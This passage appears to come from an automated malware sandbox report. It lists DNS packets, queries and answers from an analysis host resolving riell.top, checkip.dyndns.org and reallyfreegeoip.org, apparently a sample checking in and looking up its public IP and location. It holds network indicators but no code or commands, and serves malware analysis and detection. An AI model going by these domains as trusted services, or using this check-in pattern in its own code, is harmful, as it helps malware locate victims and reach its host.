            Jul 5, 2024 02:57:46.781127930 CEST53627518.8.8.8192.168.2.22
            Jul 5, 2024 02:57:50.763819933 CEST5789353192.168.2.228.8.8.8
            Jul 5, 2024 02:57:50.773986101 CEST53578938.8.8.8192.168.2.22
            Jul 5, 2024 02:57:50.775417089 CEST5482153192.168.2.228.8.8.8
            Jul 5, 2024 02:57:50.785908937 CEST53548218.8.8.8192.168.2.22
            Jul 5, 2024 02:57:51.853096008 CEST5471953192.168.2.228.8.8.8
            Jul 5, 2024 02:57:51.860044003 CEST53547198.8.8.8192.168.2.22
            Jul 5, 2024 02:57:51.861242056 CEST4988153192.168.2.228.8.8.8
            Jul 5, 2024 02:57:51.871783972 CEST53498818.8.8.8192.168.2.22
            Jul 5, 2024 02:57:52.871532917 CEST5499853192.168.2.228.8.8.8
            Jul 5, 2024 02:57:52.881580114 CEST53549988.8.8.8192.168.2.22
            Jul 5, 2024 02:57:52.882613897 CEST5278153192.168.2.228.8.8.8
            Jul 5, 2024 02:57:52.889556885 CEST53527818.8.8.8192.168.2.22
            Jul 5, 2024 02:57:56.102633953 CEST6392653192.168.2.228.8.8.8
            Jul 5, 2024 02:57:56.109555960 CEST53639268.8.8.8192.168.2.22
            Jul 5, 2024 02:57:59.975419998 CEST6551053192.168.2.228.8.8.8
            Jul 5, 2024 02:57:59.982429981 CEST53655108.8.8.8192.168.2.22
            Jul 5, 2024 02:57:59.996090889 CEST6267253192.168.2.228.8.8.8
            Jul 5, 2024 02:58:00.002489090 CEST53626728.8.8.8192.168.2.22
            Jul 5, 2024 02:58:00.211047888 CEST5647553192.168.2.228.8.8.8
            Jul 5, 2024 02:58:00.218139887 CEST53564758.8.8.8192.168.2.22
            Jul 5, 2024 02:58:00.220371008 CEST4938453192.168.2.228.8.8.8
            Jul 5, 2024 02:58:00.227061987 CEST53493848.8.8.8192.168.2.22
            Jul 5, 2024 02:58:00.799050093 CEST5484253192.168.2.228.8.8.8
            Jul 5, 2024 02:58:00.808989048 CEST53548428.8.8.8192.168.2.22
            Jul 5, 2024 02:58:02.768567085 CEST5810553192.168.2.228.8.8.8
            Jul 5, 2024 02:58:02.784918070 CEST53581058.8.8.8192.168.2.22
            Jul 5, 2024 02:58:02.786314964 CEST6492853192.168.2.228.8.8.8
            Jul 5, 2024 02:58:02.796595097 CEST53649288.8.8.8192.168.2.22
            Jul 5, 2024 02:58:03.402816057 CEST5739053192.168.2.228.8.8.8
            Jul 5, 2024 02:58:03.409512043 CEST53573908.8.8.8192.168.2.22
            Jul 5, 2024 02:58:03.412389994 CEST5809553192.168.2.228.8.8.8
            Jul 5, 2024 02:58:03.418720961 CEST53580958.8.8.8192.168.2.22
            Jul 5, 2024 02:58:04.418906927 CEST5426153192.168.2.228.8.8.8
            Jul 5, 2024 02:58:04.428349018 CEST53542618.8.8.8192.168.2.22
            Jul 5, 2024 02:58:05.088566065 CEST6050753192.168.2.228.8.8.8
            Jul 5, 2024 02:58:05.094661951 CEST53605078.8.8.8192.168.2.22
            Jul 5, 2024 02:58:05.096973896 CEST5044653192.168.2.228.8.8.8
            Jul 5, 2024 02:58:05.105021954 CEST53504468.8.8.8192.168.2.22
            Jul 5, 2024 02:58:06.309015036 CEST5593953192.168.2.228.8.8.8
            Jul 5, 2024 02:58:06.320322990 CEST53559398.8.8.8192.168.2.22
            Jul 5, 2024 02:58:07.003817081 CEST4960853192.168.2.228.8.8.8
            Jul 5, 2024 02:58:07.010166883 CEST53496088.8.8.8192.168.2.22
            Jul 5, 2024 02:58:07.012911081 CEST6148653192.168.2.228.8.8.8
            Jul 5, 2024 02:58:07.019341946 CEST53614868.8.8.8192.168.2.22
            Jul 5, 2024 02:58:07.530756950 CEST6245353192.168.2.228.8.8.8
            Jul 5, 2024 02:58:07.537463903 CEST53624538.8.8.8192.168.2.22
            Jul 5, 2024 02:58:07.537686110 CEST6245353192.168.2.228.8.8.8
            Jul 5, 2024 02:58:07.544311047 CEST53624538.8.8.8192.168.2.22
            Jul 5, 2024 02:58:08.187642097 CEST5056853192.168.2.228.8.8.8
            Jul 5, 2024 02:58:08.194178104 CEST53505688.8.8.8192.168.2.22
            Jul 5, 2024 02:58:08.194381952 CEST5056853192.168.2.228.8.8.8
            Jul 5, 2024 02:58:08.200798035 CEST53505688.8.8.8192.168.2.22
            Jul 5, 2024 02:58:08.207272053 CEST6146753192.168.2.228.8.8.8
            Jul 5, 2024 02:58:08.213355064 CEST53614678.8.8.8192.168.2.22
            Jul 5, 2024 02:58:08.980386019 CEST6161853192.168.2.228.8.8.8
            Jul 5, 2024 02:58:08.989386082 CEST53616188.8.8.8192.168.2.22
            Jul 5, 2024 02:58:09.629807949 CEST5442253192.168.2.228.8.8.8
            Jul 5, 2024 02:58:09.636415005 CEST53544228.8.8.8192.168.2.22
            Jul 5, 2024 02:58:09.640894890 CEST5207453192.168.2.228.8.8.8
            Jul 5, 2024 02:58:09.647344112 CEST53520748.8.8.8192.168.2.22
            Jul 5, 2024 02:58:10.596538067 CEST5033753192.168.2.228.8.8.8
            Jul 5, 2024 02:58:10.606524944 CEST53503378.8.8.8192.168.2.22
            Jul 5, 2024 02:58:11.339231014 CEST6182653192.168.2.228.8.8.8
            Jul 5, 2024 02:58:11.345479965 CEST53618268.8.8.8192.168.2.22
            Jul 5, 2024 02:58:11.347603083 CEST5632953192.168.2.228.8.8.8
            Jul 5, 2024 02:58:11.353991985 CEST53563298.8.8.8192.168.2.22
            Jul 5, 2024 02:58:12.010010004 CEST6346953192.168.2.228.8.8.8
            Jul 5, 2024 02:58:12.019402027 CEST53634698.8.8.8192.168.2.22
            Jul 5, 2024 02:58:12.019601107 CEST6346953192.168.2.228.8.8.8
            Jul 5, 2024 02:58:12.026345968 CEST53634698.8.8.8192.168.2.22

            DNS Queries

            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
            Jul 5, 2024 02:57:45.569900990 CEST192.168.2.228.8.8.80x23abStandard query (0)riell.topA (IP address)IN (0x0001)false
            Jul 5, 2024 02:57:46.757600069 CEST192.168.2.228.8.8.80xdd1eStandard query (0)riell.topA (IP address)IN (0x0001)false
            Jul 5, 2024 02:57:46.769013882 CEST192.168.2.228.8.8.80x6595Standard query (0)riell.topA (IP address)IN (0x0001)false
            Jul 5, 2024 02:57:50.763819933 CEST192.168.2.228.8.8.80x1100Standard query (0)riell.topA (IP address)IN (0x0001)false
            Jul 5, 2024 02:57:50.775417089 CEST192.168.2.228.8.8.80x2664Standard query (0)riell.topA (IP address)IN (0x0001)false
            Jul 5, 2024 02:57:51.853096008 CEST192.168.2.228.8.8.80xb6ecStandard query (0)riell.topA (IP address)IN (0x0001)false
            Jul 5, 2024 02:57:51.861242056 CEST192.168.2.228.8.8.80xd97eStandard query (0)riell.topA (IP address)IN (0x0001)false
            Jul 5, 2024 02:57:52.871532917 CEST192.168.2.228.8.8.80x9c5bStandard query (0)riell.topA (IP address)IN (0x0001)false
            Jul 5, 2024 02:57:52.882613897 CEST192.168.2.228.8.8.80x4189Standard query (0)riell.topA (IP address)IN (0x0001)false
            Jul 5, 2024 02:57:56.102633953 CEST192.168.2.228.8.8.80xb80cStandard query (0)riell.topA (IP address)IN (0x0001)false
            Jul 5, 2024 02:57:59.975419998 CEST192.168.2.228.8.8.80xc4a8Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
            Jul 5, 2024 02:57:59.996090889 CEST192.168.2.228.8.8.80x1ff7Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:00.211047888 CEST192.168.2.228.8.8.80x2383Standard query (0)riell.topA (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:00.220371008 CEST192.168.2.228.8.8.80x1185Standard query (0)riell.topA (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:00.799050093 CEST192.168.2.228.8.8.80xc8bStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:02.768567085 CEST192.168.2.228.8.8.80x98abStandard query (0)riell.topA (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:02.786314964 CEST192.168.2.228.8.8.80xae0fStandard query (0)riell.topA (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:03.402816057 CEST192.168.2.228.8.8.80xf7d4Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:03.412389994 CEST192.168.2.228.8.8.80xbf66Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:04.418906927 CEST192.168.2.228.8.8.80x97e7Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:05.088566065 CEST192.168.2.228.8.8.80xbcabStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:05.096973896 CEST192.168.2.228.8.8.80x7949Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:06.309015036 CEST192.168.2.228.8.8.80x6107Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:07.003817081 CEST192.168.2.228.8.8.80x63f9Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:07.012911081 CEST192.168.2.228.8.8.80x34a4Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:07.530756950 CEST192.168.2.228.8.8.80x76c3Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:07.537686110 CEST192.168.2.228.8.8.80x76c3Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:08.187642097 CEST192.168.2.228.8.8.80x4a5eStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:08.194381952 CEST192.168.2.228.8.8.80x4a5eStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:08.207272053 CEST192.168.2.228.8.8.80xac5cStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:08.980386019 CEST192.168.2.228.8.8.80xae3aStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:09.629807949 CEST192.168.2.228.8.8.80xfa52Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:09.640894890 CEST192.168.2.228.8.8.80x9487Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:10.596538067 CEST192.168.2.228.8.8.80x103Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:11.339231014 CEST192.168.2.228.8.8.80x1e7Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:11.347603083 CEST192.168.2.228.8.8.80xa078Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:12.010010004 CEST192.168.2.228.8.8.80x8c4dStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:12.019601107 CEST192.168.2.228.8.8.80x8c4dStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false

            DNS Answers

            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
            Jul 5, 2024 02:57:45.580871105 CEST8.8.8.8192.168.2.220x23abNo error (0)riell.top188.114.96.3A (IP address)IN (0x0001)false
            Jul 5, 2024 02:57:45.580871105 CEST8.8.8.8192.168.2.220x23abNo error (0)riell.top188.114.97.3A (IP address)IN (0x0001)false
            Jul 5, 2024 02:57:46.767744064 CEST8.8.8.8192.168.2.220xdd1eNo error (0)riell.top188.114.97.3A (IP address)IN (0x0001)false
            Jul 5, 2024 02:57:46.767744064 CEST8.8.8.8192.168.2.220xdd1eNo error (0)riell.top188.114.96.3A (IP address)IN (0x0001)false
            Jul 5, 2024 02:57:46.781127930 CEST8.8.8.8192.168.2.220x6595No error (0)riell.top188.114.96.3A (IP address)IN (0x0001)false
            Jul 5, 2024 02:57:46.781127930 CEST8.8.8.8192.168.2.220x6595No error (0)riell.top188.114.97.3A (IP address)IN (0x0001)false
            Jul 5, 2024 02:57:50.773986101 CEST8.8.8.8192.168.2.220x1100No error (0)riell.top188.114.97.3A (IP address)IN (0x0001)false
            Jul 5, 2024 02:57:50.773986101 CEST8.8.8.8192.168.2.220x1100No error (0)riell.top188.114.96.3A (IP address)IN (0x0001)false
            Jul 5, 2024 02:57:50.785908937 CEST8.8.8.8192.168.2.220x2664No error (0)riell.top188.114.96.3A (IP address)IN (0x0001)false
            Jul 5, 2024 02:57:50.785908937 CEST8.8.8.8192.168.2.220x2664No error (0)riell.top188.114.97.3A (IP address)IN (0x0001)false
            Jul 5, 2024 02:57:51.860044003 CEST8.8.8.8192.168.2.220xb6ecNo error (0)riell.top188.114.96.3A (IP address)IN (0x0001)false
            Jul 5, 2024 02:57:51.860044003 CEST8.8.8.8192.168.2.220xb6ecNo error (0)riell.top188.114.97.3A (IP address)IN (0x0001)false
            Jul 5, 2024 02:57:51.871783972 CEST8.8.8.8192.168.2.220xd97eNo error (0)riell.top188.114.96.3A (IP address)IN (0x0001)false
            Jul 5, 2024 02:57:51.871783972 CEST8.8.8.8192.168.2.220xd97eNo error (0)riell.top188.114.97.3A (IP address)IN (0x0001)false
            Jul 5, 2024 02:57:52.881580114 CEST8.8.8.8192.168.2.220x9c5bNo error (0)riell.top188.114.96.3A (IP address)IN (0x0001)false
            Jul 5, 2024 02:57:52.881580114 CEST8.8.8.8192.168.2.220x9c5bNo error (0)riell.top188.114.97.3A (IP address)IN (0x0001)false
            Jul 5, 2024 02:57:52.889556885 CEST8.8.8.8192.168.2.220x4189No error (0)riell.top188.114.96.3A (IP address)IN (0x0001)false
            Jul 5, 2024 02:57:52.889556885 CEST8.8.8.8192.168.2.220x4189No error (0)riell.top188.114.97.3A (IP address)IN (0x0001)false
            Jul 5, 2024 02:57:56.109555960 CEST8.8.8.8192.168.2.220xb80cNo error (0)riell.top188.114.97.3A (IP address)IN (0x0001)false
            Jul 5, 2024 02:57:56.109555960 CEST8.8.8.8192.168.2.220xb80cNo error (0)riell.top188.114.96.3A (IP address)IN (0x0001)false
            Jul 5, 2024 02:57:59.982429981 CEST8.8.8.8192.168.2.220xc4a8No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
            Jul 5, 2024 02:57:59.982429981 CEST8.8.8.8192.168.2.220xc4a8No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
            Jul 5, 2024 02:57:59.982429981 CEST8.8.8.8192.168.2.220xc4a8No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
            Jul 5, 2024 02:57:59.982429981 CEST8.8.8.8192.168.2.220xc4a8No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
            Jul 5, 2024 02:57:59.982429981 CEST8.8.8.8192.168.2.220xc4a8No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
            Jul 5, 2024 02:57:59.982429981 CEST8.8.8.8192.168.2.220xc4a8No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:00.002489090 CEST8.8.8.8192.168.2.220x1ff7No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
            Jul 5, 2024 02:58:00.002489090 CEST8.8.8.8192.168.2.220x1ff7No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:00.002489090 CEST8.8.8.8192.168.2.220x1ff7No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:00.002489090 CEST8.8.8.8192.168.2.220x1ff7No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:00.002489090 CEST8.8.8.8192.168.2.220x1ff7No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:00.002489090 CEST8.8.8.8192.168.2.220x1ff7No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:00.218139887 CEST8.8.8.8192.168.2.220x2383No error (0)riell.top188.114.97.3A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:00.218139887 CEST8.8.8.8192.168.2.220x2383No error (0)riell.top188.114.96.3A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:00.227061987 CEST8.8.8.8192.168.2.220x1185No error (0)riell.top188.114.97.3A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:00.227061987 CEST8.8.8.8192.168.2.220x1185No error (0)riell.top188.114.96.3A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:00.808989048 CEST8.8.8.8192.168.2.220xc8bNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:00.808989048 CEST8.8.8.8192.168.2.220xc8bNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:02.784918070 CEST8.8.8.8192.168.2.220x98abNo error (0)riell.top188.114.97.3A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:02.784918070 CEST8.8.8.8192.168.2.220x98abNo error (0)riell.top188.114.96.3A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:02.796595097 CEST8.8.8.8192.168.2.220xae0fNo error (0)riell.top188.114.96.3A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:02.796595097 CEST8.8.8.8192.168.2.220xae0fNo error (0)riell.top188.114.97.3A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:03.409512043 CEST8.8.8.8192.168.2.220xf7d4No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
            Jul 5, 2024 02:58:03.409512043 CEST8.8.8.8192.168.2.220xf7d4No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:03.409512043 CEST8.8.8.8192.168.2.220xf7d4No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:03.409512043 CEST8.8.8.8192.168.2.220xf7d4No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:03.409512043 CEST8.8.8.8192.168.2.220xf7d4No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:03.409512043 CEST8.8.8.8192.168.2.220xf7d4No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:03.418720961 CEST8.8.8.8192.168.2.220xbf66No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
            Jul 5, 2024 02:58:03.418720961 CEST8.8.8.8192.168.2.220xbf66No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:03.418720961 CEST8.8.8.8192.168.2.220xbf66No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:03.418720961 CEST8.8.8.8192.168.2.220xbf66No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:03.418720961 CEST8.8.8.8192.168.2.220xbf66No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:03.418720961 CEST8.8.8.8192.168.2.220xbf66No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:04.428349018 CEST8.8.8.8192.168.2.220x97e7No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:04.428349018 CEST8.8.8.8192.168.2.220x97e7No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:05.094661951 CEST8.8.8.8192.168.2.220xbcabNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
            Jul 5, 2024 02:58:05.094661951 CEST8.8.8.8192.168.2.220xbcabNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:05.094661951 CEST8.8.8.8192.168.2.220xbcabNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:05.094661951 CEST8.8.8.8192.168.2.220xbcabNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:05.094661951 CEST8.8.8.8192.168.2.220xbcabNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:05.094661951 CEST8.8.8.8192.168.2.220xbcabNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:05.105021954 CEST8.8.8.8192.168.2.220x7949No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
            Jul 5, 2024 02:58:05.105021954 CEST8.8.8.8192.168.2.220x7949No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:05.105021954 CEST8.8.8.8192.168.2.220x7949No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:05.105021954 CEST8.8.8.8192.168.2.220x7949No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:05.105021954 CEST8.8.8.8192.168.2.220x7949No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:05.105021954 CEST8.8.8.8192.168.2.220x7949No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:06.320322990 CEST8.8.8.8192.168.2.220x6107No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:06.320322990 CEST8.8.8.8192.168.2.220x6107No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:07.010166883 CEST8.8.8.8192.168.2.220x63f9No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
            Jul 5, 2024 02:58:07.010166883 CEST8.8.8.8192.168.2.220x63f9No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:07.010166883 CEST8.8.8.8192.168.2.220x63f9No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:07.010166883 CEST8.8.8.8192.168.2.220x63f9No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:07.010166883 CEST8.8.8.8192.168.2.220x63f9No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:07.010166883 CEST8.8.8.8192.168.2.220x63f9No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:07.019341946 CEST8.8.8.8192.168.2.220x34a4No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
            Jul 5, 2024 02:58:07.019341946 CEST8.8.8.8192.168.2.220x34a4No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:07.019341946 CEST8.8.8.8192.168.2.220x34a4No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:07.019341946 CEST8.8.8.8192.168.2.220x34a4No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:07.019341946 CEST8.8.8.8192.168.2.220x34a4No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:07.019341946 CEST8.8.8.8192.168.2.220x34a4No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:07.537463903 CEST8.8.8.8192.168.2.220x76c3No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:07.537463903 CEST8.8.8.8192.168.2.220x76c3No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:07.544311047 CEST8.8.8.8192.168.2.220x76c3No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:07.544311047 CEST8.8.8.8192.168.2.220x76c3No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:08.194178104 CEST8.8.8.8192.168.2.220x4a5eNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
            Jul 5, 2024 02:58:08.194178104 CEST8.8.8.8192.168.2.220x4a5eNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:08.194178104 CEST8.8.8.8192.168.2.220x4a5eNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:08.194178104 CEST8.8.8.8192.168.2.220x4a5eNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:08.194178104 CEST8.8.8.8192.168.2.220x4a5eNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:08.194178104 CEST8.8.8.8192.168.2.220x4a5eNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:08.200798035 CEST8.8.8.8192.168.2.220x4a5eNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
            Jul 5, 2024 02:58:08.200798035 CEST8.8.8.8192.168.2.220x4a5eNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:08.200798035 CEST8.8.8.8192.168.2.220x4a5eNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:08.200798035 CEST8.8.8.8192.168.2.220x4a5eNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:08.200798035 CEST8.8.8.8192.168.2.220x4a5eNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:08.200798035 CEST8.8.8.8192.168.2.220x4a5eNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:08.213355064 CEST8.8.8.8192.168.2.220xac5cNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
            Jul 5, 2024 02:58:08.213355064 CEST8.8.8.8192.168.2.220xac5cNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:08.213355064 CEST8.8.8.8192.168.2.220xac5cNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:08.213355064 CEST8.8.8.8192.168.2.220xac5cNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:08.213355064 CEST8.8.8.8192.168.2.220xac5cNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:08.213355064 CEST8.8.8.8192.168.2.220xac5cNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:08.989386082 CEST8.8.8.8192.168.2.220xae3aNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:08.989386082 CEST8.8.8.8192.168.2.220xae3aNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:09.636415005 CEST8.8.8.8192.168.2.220xfa52No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
            Jul 5, 2024 02:58:09.636415005 CEST8.8.8.8192.168.2.220xfa52No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:09.636415005 CEST8.8.8.8192.168.2.220xfa52No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:09.636415005 CEST8.8.8.8192.168.2.220xfa52No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:09.636415005 CEST8.8.8.8192.168.2.220xfa52No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:09.636415005 CEST8.8.8.8192.168.2.220xfa52No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:09.647344112 CEST8.8.8.8192.168.2.220x9487No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
            Jul 5, 2024 02:58:09.647344112 CEST8.8.8.8192.168.2.220x9487No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:09.647344112 CEST8.8.8.8192.168.2.220x9487No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
